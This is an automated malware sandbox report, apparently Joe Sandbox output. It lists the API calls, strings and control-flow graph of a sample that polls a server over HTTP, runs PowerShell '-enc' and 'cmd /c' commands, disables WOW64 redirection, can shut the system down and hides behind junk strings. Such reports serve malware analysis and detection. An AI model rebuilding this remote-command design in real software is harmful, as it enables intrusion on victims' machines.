                • CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00E484B5
                • CryptAcquireContextA.ADVAPI32(00E4A4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00E484D1
                • CoInitializeEx.OLE32(00000000,00000000), ref: 00E4851C
                • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 00E48533
                • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 00E48552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: AcquireContextCreateCryptHeapInitializeProcessQueryValue$AllocCloseCountCriticalEnvironmentErrorExitExpandFileFromInformationLastMutexOpenSectionStartupStringStringsTickVolumewsprintf
                • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
                • API String ID: 267019445-2941900213
                • Opcode ID: ed694a431efa30eb29ce03a72057273e4d71750efe0380cb30f3dc1f7a8ae417
                • Instruction ID: 3ad96e7ce30073c35ece0833e02b0695554306873a385c4fd5e6f62a5a9db358
                • Opcode Fuzzy Hash: ed694a431efa30eb29ce03a72057273e4d71750efe0380cb30f3dc1f7a8ae417
                • Instruction Fuzzy Hash: 96412474A80308EEEB24DFA0ED0AFAE7778FB01705F1440A5F604FA1D1EBB095498B95
                APIs
                • CryptGenRandom.ADVAPI32(00000020,?), ref: 00E48FD8
                  • Part of subcall function 00E42680: GetProcessHeap.KERNEL32(00000008,AAAAAAAB,?,?,?,?,00E49025,00000000), ref: 00E426A2
                  • Part of subcall function 00E42680: HeapAlloc.KERNEL32(00000000,?,?,?,?,00E49025,00000000), ref: 00E426A9
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E49035
                • HeapFree.KERNEL32(00000000), ref: 00E4903C
                • wsprintfA.USER32 ref: 00E4906F
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490A8
                • HeapFree.KERNEL32(00000000), ref: 00E490AB
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E490B0
                • HeapFree.KERNEL32(00000000), ref: 00E490B3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: Heap$Process$Free$AllocCryptRandomwsprintf
                • String ID: %d|%s|%s|%s$VoYGkc5R
                • API String ID: 4113358155-4073333701
                • Opcode ID: 5df7d4684719a9a6ba6688cfbac78b61b6c4db8fcce0a5711401e91dd1015ba6
                • Instruction ID: e30b58c0cff09f2468fdbe2abc773713dfb61a1477590745f483e9701afe6bdc
                • Opcode Fuzzy Hash: 5df7d4684719a9a6ba6688cfbac78b61b6c4db8fcce0a5711401e91dd1015ba6
                • Instruction Fuzzy Hash: 1C210675E403086FEB10ABA0BC4AFEF7B6CDF45755F081164FA04B71C2EA619909C7A2
                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00E4625D
                • OpenProcessToken.ADVAPI32(00000000), ref: 00E46264
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00E46279
                • CloseHandle.KERNEL32(?), ref: 00E46286
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00E462B0
                • CloseHandle.KERNEL32(?), ref: 00E462BB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandleProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                • String ID: SeShutdownPrivilege
                • API String ID: 158869116-3733053543
                • Opcode ID: 93ebfe76c21ede5d197b43243b29aa980a011fd1861d4a6469ed55088216293c
                • Instruction ID: 960cf90657e4fec1db81cab5e01cad724c1aaf48d156101c48b35a0c6ebf3fb8
                • Opcode Fuzzy Hash: 93ebfe76c21ede5d197b43243b29aa980a011fd1861d4a6469ed55088216293c
                • Instruction Fuzzy Hash: D0014F75E40218FFDB209BE5AD0ABEFBBB8EB05702F100195B904B6190D7B19A1997A1
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00624228
                • IsDebuggerPresent.KERNEL32 ref: 006242F4
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00624314
                • UnhandledExceptionFilter.KERNEL32(?), ref: 0062431E
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: 40a467a05cf410c79dcb6b28d36d5d02b86c8da187ba049e1bb2aa5607abbe65
                • Instruction ID: c30868ce36044f7428dedb06307bcab82248274d8799656a79c819668146fdfe
                • Opcode Fuzzy Hash: 40a467a05cf410c79dcb6b28d36d5d02b86c8da187ba049e1bb2aa5607abbe65
                • Instruction Fuzzy Hash: 4C312975D0526CDBDB11DFA4E989BCDBBB8AF08304F1040AAE40CAB250EB715A858F44
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00626A53
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00626A5D
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00626A6A
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: f70535285dba876066c7485ac4ddc87696e5aa97390d053c3c735458d73d4006
                • Instruction ID: ae15eb512fbfc2ec2aa24d6ace747ebe3df85b0b7ddf7f1b24e7023fcee902fc
                • Opcode Fuzzy Hash: f70535285dba876066c7485ac4ddc87696e5aa97390d053c3c735458d73d4006
                • Instruction Fuzzy Hash: C331C3759016289BCB61DF64ED897CDBBB9BF08310F5081EAE41CA7260EB709F858F44
                APIs
                • GetCurrentProcess.KERNEL32(?,?,006275A1,?,?,?,?,?,0062C8FA), ref: 006275C4
                • TerminateProcess.KERNEL32(00000000,?,006275A1,?,?,?,?,?,0062C8FA), ref: 006275CB
                • ExitProcess.KERNEL32 ref: 006275DD
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: a78e651893f0602abf76837badfdcc0b773ba160a2e73228329d6a72d34d144a
                • Instruction ID: b45cad8f974b256e8470c7019229c8654aac458523bdf1b34035b48f753daa0e
                • Opcode Fuzzy Hash: a78e651893f0602abf76837badfdcc0b773ba160a2e73228329d6a72d34d144a
                • Instruction Fuzzy Hash: DBE08C31000998AFCF152F14EE48D883B6BEB45342F000014F904CA231CF35DD82CF94
                APIs
                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0062E878,?,?,00000008,?,?,0062E510,00000000), ref: 0062EAAA
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ExceptionRaise
                • String ID:
                • API String ID: 3997070919-0
                • Opcode ID: 43db58247c66ad18bfaf801ff97d261ab94e777afdfc52aec011453bc7654c64
                • Instruction ID: d02e4e51cf944abb9613be3cb9dbdf20e98608549e409ebcca1f7e172eec13ff
                • Opcode Fuzzy Hash: 43db58247c66ad18bfaf801ff97d261ab94e777afdfc52aec011453bc7654c64
                • Instruction Fuzzy Hash: 77B13E31610A15CFD714CF28D486BA57BA2FF45365F258669E89ACF3A1C336E982CF40
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006244DB
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: 1346204d2c13dff70d855fab18a89243147194ba43bf13d2993e2f4aa3949a4e
                • Instruction ID: b4ae6b77a4ff2a55f766af30913a5e6bc07a313ac4fd0ac26a3ef7ef13a83393
                • Opcode Fuzzy Hash: 1346204d2c13dff70d855fab18a89243147194ba43bf13d2993e2f4aa3949a4e
                • Instruction Fuzzy Hash: 94518CB1A017158FDB28CF59E9817EABBF2FB48314F14982AE441EB350DBB59944CF90
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: CountTick
                • String ID:
                • API String ID: 536389180-0
                • Opcode ID: 3445fdb7ea8f35b76b36b59f87d88b4e0c2d70e1ace742fe011673a6ed87bcb3
                • Instruction ID: e2715a84b87ad5e592790bad07458c17343402fa52b7ca6398edc4d0ecd5c8e1
                • Opcode Fuzzy Hash: 3445fdb7ea8f35b76b36b59f87d88b4e0c2d70e1ace742fe011673a6ed87bcb3
                • Instruction Fuzzy Hash: 8131627A3504018FD74CCF2EEC9962973E1F78A320759523AE536E72A0D6B4A8978B41
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_000043BB,00623BBB), ref: 006243B4
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: fb490ced2e5323b134ea85c9e18ef4e5a545ff99d5d98a760a239611d980ac54
                • Instruction ID: c999fb0acd144bd4cb260b4e319fdc237fccb428acb87b1909535a04b1907028
                • Opcode Fuzzy Hash: fb490ced2e5323b134ea85c9e18ef4e5a545ff99d5d98a760a239611d980ac54
                • Instruction Fuzzy Hash:
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: 0
                • API String ID: 0-4108050209
                • Opcode ID: ac3afc3d4a7e14a933ee7a0f1553ef86ce682994d07fd3c4d5a318ec47837b3a
                • Instruction ID: 46ac02beb6a18df15ed1ba0f985819c80c001d29532e58142c9ae043bdc3ac85
                • Opcode Fuzzy Hash: ac3afc3d4a7e14a933ee7a0f1553ef86ce682994d07fd3c4d5a318ec47837b3a
                • Instruction Fuzzy Hash: AB51A331E183D84EDB1D8BED58542FCBFB19F56200F5441AED89ABB643C6284A49CBA1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 6474ba5225f2a436f585c8f922716ca69a7f800ea25503503b4b68d89d4ed2c1
                • Instruction ID: 5b64362b9a3fc606b96897aba225b21ede34fddf655dd7ce5ab74a0242f9282c
                • Opcode Fuzzy Hash: 6474ba5225f2a436f585c8f922716ca69a7f800ea25503503b4b68d89d4ed2c1
                • Instruction Fuzzy Hash: C5A011302002808B83008F30AA0A2883BEAAB02A803002028A008CA220EB208080AAA2
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2305b5298d3a25e8921cda305a5ed4179c8203550299ed11d42086bee319de36
                • Instruction ID: 97161c069c7244e94fdef35dc2fbfea6b8dfe427544334bd16c5bb761703d1ee
                • Opcode Fuzzy Hash: 2305b5298d3a25e8921cda305a5ed4179c8203550299ed11d42086bee319de36
                • Instruction Fuzzy Hash: A5725D3492419C8EDB1DEB64E8656EC7775BF26300F8421FDE54A32563EB311A89CF60
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                • Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
                • Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
                • Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
                • Instruction ID: e9cb4df04fee7205c4a2c7099565362094ab770b52eef65535d5c92fd8c2a761
                • Opcode Fuzzy Hash: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
                • Instruction Fuzzy Hash: E6E04F72921538EBCB14DB88950498AB3ADF784B40B15445AB501D3101C270DE00DBD4

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 392 e47d90-e47de5 wsprintfA GetTickCount64 call e42650 395 e47de8-e47e09 call e466e0 392->395 398 e47e1d-e47e2b lstrcmpA 395->398 399 e47e0b-e47e1b Sleep 395->399 400 e47e2d-e47e3c call e48fc0 call e45650 398->400 401 e47e3e-e47e68 call e46490 * 2 call e462d0 398->401 399->395 400->395 412 e47e6e-e47e70 401->412 413 e482eb-e48309 GetTickCount64 401->413 412->413 416 e47e76-e47e7c 412->416 414 e4832e-e4834b call e45650 Sleep 413->414 415 e4830b 413->415 414->395 418 e48311-e4832b call e42650 call e47460 415->418 419 e4830d-e4830f 415->419 416->413 420 e47e82-e47ef5 call e45670 call e47480 call e424b0 call e45630 call e45670 call e46490 call e42650 call e47460 StrToIntA 416->420 418->414 419->414 419->418 443 e482e1-e482e9 call e45650 420->443 444 e47efb 420->444 443->414 446 e47f02-e47f16 call e46490 * 2 444->446 447 e482c3-e482ca call e46250 444->447 446->443 456 e47f1c-e47f1e 446->456 447->443 454 e482cc-e482db InitiateSystemShutdownExW 447->454 454->443 456->443 457 e47f24-e47f4d StrToIntA call e462d0 call e45630 456->457 457->443 462 e47f53-e47f59 457->462 463 e47f9f-e47fa2 462->463 464 e47f5b-e47f9d GetSystemDirectoryW PathCombineW wnsprintfW 462->464 465 e47ff4-e4803b GetModuleHandleA GetProcAddress * 2 463->465 466 e47fa4-e47fbd call e462d0 call e42790 463->466 464->465 467 e48043-e48047 465->467 468 e4803d-e48040 465->468 466->465 478 e47fbf-e47fef ExpandEnvironmentStringsW wnsprintfW call e45650 466->478 470 e48081-e480a5 LoadLibraryA GetProcAddress 467->470 471 e48049-e4805e call e45720 467->471 468->467 476 e480a9-e480ae 470->476 471->476 481 e48060-e4807f call e462d0 call e42680 call e45650 471->481 479 e480b5-e480c7 call e45630 476->479 480 e480b0 476->480 478->465 487 e480cd-e48152 call e48f60 call e47480 wsprintfA wnsprintfA call e424b0 call e466e0 479->487 488 e48168-e4817f call e45650 * 3 479->488 480->479 481->476 507 e48154-e48156 call e45650 487->507 508 e4815b-e48165 call e45650 487->508 488->414 507->508 508->488
                APIs
                • wsprintfA.USER32 ref: 00E47DB6
                • GetTickCount64.KERNEL32 ref: 00E47DC4
                  • Part of subcall function 00E466E0: ObtainUserAgentString.URLMON(00000000,?,?), ref: 00E46702
                  • Part of subcall function 00E466E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00E46722
                  • Part of subcall function 00E466E0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46788
                  • Part of subcall function 00E466E0: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00E467C1
                  • Part of subcall function 00E466E0: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E467DE
                  • Part of subcall function 00E466E0: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00E46817
                  • Part of subcall function 00E466E0: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E46840
                • Sleep.KERNEL32(00000000), ref: 00E47E16
                • lstrcmpA.KERNEL32(00000000,INIT), ref: 00E47E23
                • StrToIntA.SHLWAPI(00000000), ref: 00E47EE6
                • StrToIntA.SHLWAPI(00000000), ref: 00E47F2B
                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00E47F67
                • PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 00E47F80
                • wnsprintfW.SHLWAPI ref: 00E47F94
                • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00E47FD0
                • wnsprintfW.SHLWAPI ref: 00E47FE4
                  • Part of subcall function 00E45650: GetProcessHeap.KERNEL32(00000000,00000000,00E48335), ref: 00E45657
                  • Part of subcall function 00E45650: HeapFree.KERNEL32(00000000), ref: 00E4565E
                • GetModuleHandleA.KERNEL32(kernel32), ref: 00E48007
                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E48015
                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E4802A
                • LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 00E4808B
                • GetProcAddress.KERNEL32(00000000), ref: 00E48092
                • wsprintfA.USER32 ref: 00E480F2
                • wnsprintfA.SHLWAPI ref: 00E4811E
                  • Part of subcall function 00E42790: GetProcessHeap.KERNEL32(00000008,?), ref: 00E427A2
                  • Part of subcall function 00E42790: HeapAlloc.KERNEL32(00000000), ref: 00E427A9
                • Sleep.KERNEL32(00000000), ref: 00E48346
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true
                • Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd
                Yara matches
                Similarity
                • API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
                • String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
                • API String ID: 1920831074-1153165106
                • Opcode ID: f56512be809df7de3f62dda229553e2bf6fb6cce2d4d9030a28d4cd096d8a8c0
                • Instruction ID: 40dfc0118c18327881a0f5bc771486e4c84a6abf0485944998fab670252c95a1
                • Opcode Fuzzy Hash: f56512be809df7de3f62dda229553e2bf6fb6cce2d4d9030a28d4cd096d8a8c0
                • Instruction Fuzzy Hash: A8C1C071E00208ABCB14EFB4EC85AEEB7F9AF44300F511169F516B7291EB749E09CB95

                Control-flow Graph

                APIs
                  • Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080
                  • Part of subcall function 006226F0: operator!=.LIBCPMTD ref: 006227B9
                  • Part of subcall function 006226F0: task.LIBCPMTD ref: 006227CA
                  • Part of subcall function 006226F0: task.LIBCPMTD ref: 006227D9
                  • Part of subcall function 00622870: task.LIBCPMTD ref: 00622889
                  • Part of subcall function 00622A60: task.LIBCPMTD ref: 00622AB3
                  • Part of subcall function 00622A60: task.LIBCPMTD ref: 00622AC2
                • task.LIBCPMTD ref: 00622C96
                  • Part of subcall function 00622450: task.LIBCPMTD ref: 006224E6
                  • Part of subcall function 00622450: task.LIBCPMTD ref: 006224F2
                  • Part of subcall function 00622450: task.LIBCPMTD ref: 006224FE
                  • Part of subcall function 00622450: task.LIBCPMTD ref: 0062250A
                  • Part of subcall function 00622450: task.LIBCPMTD ref: 00622519
                  • Part of subcall function 00621BD0: task.LIBCPMTD ref: 00621C63
                  • Part of subcall function 00621BD0: task.LIBCPMTD ref: 00621C72
                  • Part of subcall function 00621D30: operator!=.LIBCPMTD ref: 00621DB9
                  • Part of subcall function 00621D30: task.LIBCPMTD ref: 00621DC7
                  • Part of subcall function 00621D30: task.LIBCPMTD ref: 00621DD6
                  • Part of subcall function 00621E90: task.LIBCPMTD ref: 00621F50
                  • Part of subcall function 00621E90: task.LIBCPMTD ref: 00621F5F
                  • Part of subcall function 00621FF0: task.LIBCPMTD ref: 0062204A
                  • Part of subcall function 00621FF0: task.LIBCPMTD ref: 00622056
                  • Part of subcall function 00621FF0: task.LIBCPMTD ref: 00622065
                  • Part of subcall function 00622090: task.LIBCPMTD ref: 006220E6
                • task.LIBCPMTD ref: 00622E58
                • task.LIBCPMTD ref: 00622EFC
                  • Part of subcall function 006221A0: operator!=.LIBCPMTD ref: 00622294
                  • Part of subcall function 006221A0: task.LIBCPMTD ref: 006222A5
                  • Part of subcall function 006221A0: task.LIBCPMTD ref: 006222B4
                Strings
                • cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho, xrefs: 00622E11
                • shtumcttjzvhu, xrefs: 00622E65
                • brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis, xrefs: 00622E7E
                • syntqwezljesnhnfjaztdeotfzpejojodftab, xrefs: 00622EB0
                • rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb, xrefs: 00622C52
                • yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy, xrefs: 00622E36
                • fuisqwdbksjnkwghhwh, xrefs: 00622CC8
                • gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa, xrefs: 00622D71
                • upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs, xrefs: 00622B5E
                • ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund, xrefs: 00622C12
                • jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu, xrefs: 00622D8A
